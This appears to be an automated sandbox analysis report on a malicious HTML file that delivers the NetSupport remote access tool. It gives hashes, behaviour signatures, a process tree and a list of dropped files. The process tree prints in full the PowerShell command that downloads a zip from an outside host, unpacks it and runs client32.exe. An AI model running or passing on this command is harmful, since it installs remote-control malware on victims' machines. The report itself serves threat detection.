Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28-05-2024 18:38

General

  • Target

    Scanned_05_28-2024_402430.html

  • Size

    8KB

  • MD5

    784b4c79a9c2a62a393bbe72714f2043

  • SHA1

    aef37309eacd572503df355ef75ad42021fcd253

  • SHA256

    37961d0ca2cdbc6ad9bf89a892d230d5be6273d34accb3dac4251281ea048ed9

  • SHA512

    e269f6f767be7453e7b402de620786b6464be65bbfd3f5a8ae2fc4e8c873526bb3c9414b598245a2aae2966fcd6946b5b2f97db11acfc48c8916c370989a1024

  • SSDEEP

    96:MhvvIFO2B40aPMfiWTMFSCH+PGy9MgC3/mGlby3Pnwp0tUNAkacVjS0uT9ji/Di5:MGZEhLqMgEOG4/nw+CWvYAZi/Di5

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as legitimate system administration software.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    PowerShell Invoke-WebRequest.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Scanned_05_28-2024_402430.html
    1⤵
      PID:3372
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3972 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:1
      1⤵
        PID:3456
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5764 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:1
        1⤵
          PID:5016
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5944 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:4632
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5484 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:1
            1⤵
              PID:4640
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=4796 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
              1⤵
                PID:3512
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start /min powershell $st='c:\\users\\public';$om=$st+'\\start.zip';$ps=$st+'\\client\\client32.exe';invoke-webrequest -uri https://cdn3535.shop/1.zip -outfile $om;expand-archive $om $st; start-process $ps;Set-Clipboard -Value ' ';exit;
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:4980
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell $st='c:\\users\\public';$om=$st+'\\start.zip';$ps=$st+'\\client\\client32.exe';invoke-webrequest -uri https://cdn3535.shop/1.zip -outfile $om;expand-archive $om $st; start-process $ps;Set-Clipboard -Value ' ';exit;
                  2⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1388
                  • C:\users\public\client\client32.exe
                    "C:\users\public\client\client32.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:4532

              Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3iv040a.enl.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Public\client\HTCTL32.DLL

                Filesize

                320KB

                MD5

                2d3b207c8a48148296156e5725426c7f

                SHA1

                ad464eb7cf5c19c8a443ab5b590440b32dbc618f

                SHA256

                edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

                SHA512

                55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

              • C:\Users\Public\client\PCICHEK.DLL

                Filesize

                18KB

                MD5

                a0b9388c5f18e27266a31f8c5765b263

                SHA1

                906f7e94f841d464d4da144f7c858fa2160e36db

                SHA256

                313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

                SHA512

                6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

              • C:\Users\Public\client\client32.exe

                Filesize

                54KB

                MD5

                9497aece91e1ccc495ca26ae284600b9

                SHA1

                a005d8ce0c1ea8901c1b4ea86c40f4925bd2c6da

                SHA256

                1b63f83f06dbd9125a6983a36e0dbd64026bb4f535e97c5df67c1563d91eff89

                SHA512

                4c892e5029a707bcf73b85ac110d8078cb273632b68637e9b296a7474ab0202320ff24cf6206de04af08abf087654b0d80cbecfae824c06616c47ce93f0929c9

              • C:\users\public\client\MSVCR100.dll

                Filesize

                755KB

                MD5

                0e37fbfa79d349d672456923ec5fbbe3

                SHA1

                4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

                SHA256

                8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

                SHA512

                2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

              • C:\users\public\client\NSM.LIC

                Filesize

                257B

                MD5

                6fd57fbafce2705f6dbe31df8e9c63cb

                SHA1

                9dbdd6322a37609780d5370a59efbef7d74d4b0d

                SHA256

                d7ec9f8b88ae02b6075db789ac8ac7cbb359fe54bb1a2af1669ea1c8a15fc91e

                SHA512

                ff96b534dac567450bd3670a4f3feaf0af94334af53ec06b66386489bce842fb4f8c41963d28b066d1624d790add8ead7e4871c3cf55d27ab943a74458cdb4cf

              • C:\users\public\client\PCICL32.dll

                Filesize

                3.5MB

                MD5

                ad51946b1659ed61b76ff4e599e36683

                SHA1

                dfe2439424886e8acf9fa3ffde6caaf7bfdd583e

                SHA256

                07a191254362664b3993479a277199f7ea5ee723b6c25803914eedb50250acf4

                SHA512

                6c30e7793f69508f6d9aa6edcec6930ba361628ef597e32c218e15d80586f5a86d89fcbee63a35eab7b1e0ae26277512f4c1a03df7912f9b7ff9a9a858cf3962

              • C:\users\public\client\client32.ini

                Filesize

                646B

                MD5

                1181c5070b3d5dbd82e3167e0eee7d13

                SHA1

                91aaf3e633d11d4dbb82e53a8fe6f7f461ff2ea6

                SHA256

                608e848e65d4298688ac18a939f7ac1848332ef7c39ec4e135091a2ebeb1a524

                SHA512

                1b0dbd30252bf924aa82777e380c2e82309ff8be6120b05916f7bb72d5270542c3bc2cee965c7c8c58196651e261788b2e29377cb5764e42d65de92015411780

              • C:\users\public\client\pcicapi.dll

                Filesize

                32KB

                MD5

                dcde2248d19c778a41aa165866dd52d0

                SHA1

                7ec84be84fe23f0b0093b647538737e1f19ebb03

                SHA256

                9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

                SHA512

                c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

              • memory/1388-15-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

              • memory/1388-21-0x000001F655A80000-0x000001F655A92000-memory.dmp

                Filesize

                72KB

              • memory/1388-22-0x000001F63B980000-0x000001F63B98A000-memory.dmp

                Filesize

                40KB

              • memory/1388-19-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

              • memory/1388-18-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

              • memory/1388-17-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

              • memory/1388-16-0x00007FFC8A143000-0x00007FFC8A145000-memory.dmp

                Filesize

                8KB

              • memory/1388-2-0x00007FFC8A143000-0x00007FFC8A145000-memory.dmp

                Filesize

                8KB

              • memory/1388-14-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

              • memory/1388-13-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB

              • memory/1388-12-0x000001F63B9A0000-0x000001F63B9C2000-memory.dmp

                Filesize

                136KB

              • memory/1388-76-0x00007FFC8A140000-0x00007FFC8AC01000-memory.dmp

                Filesize

                10.8MB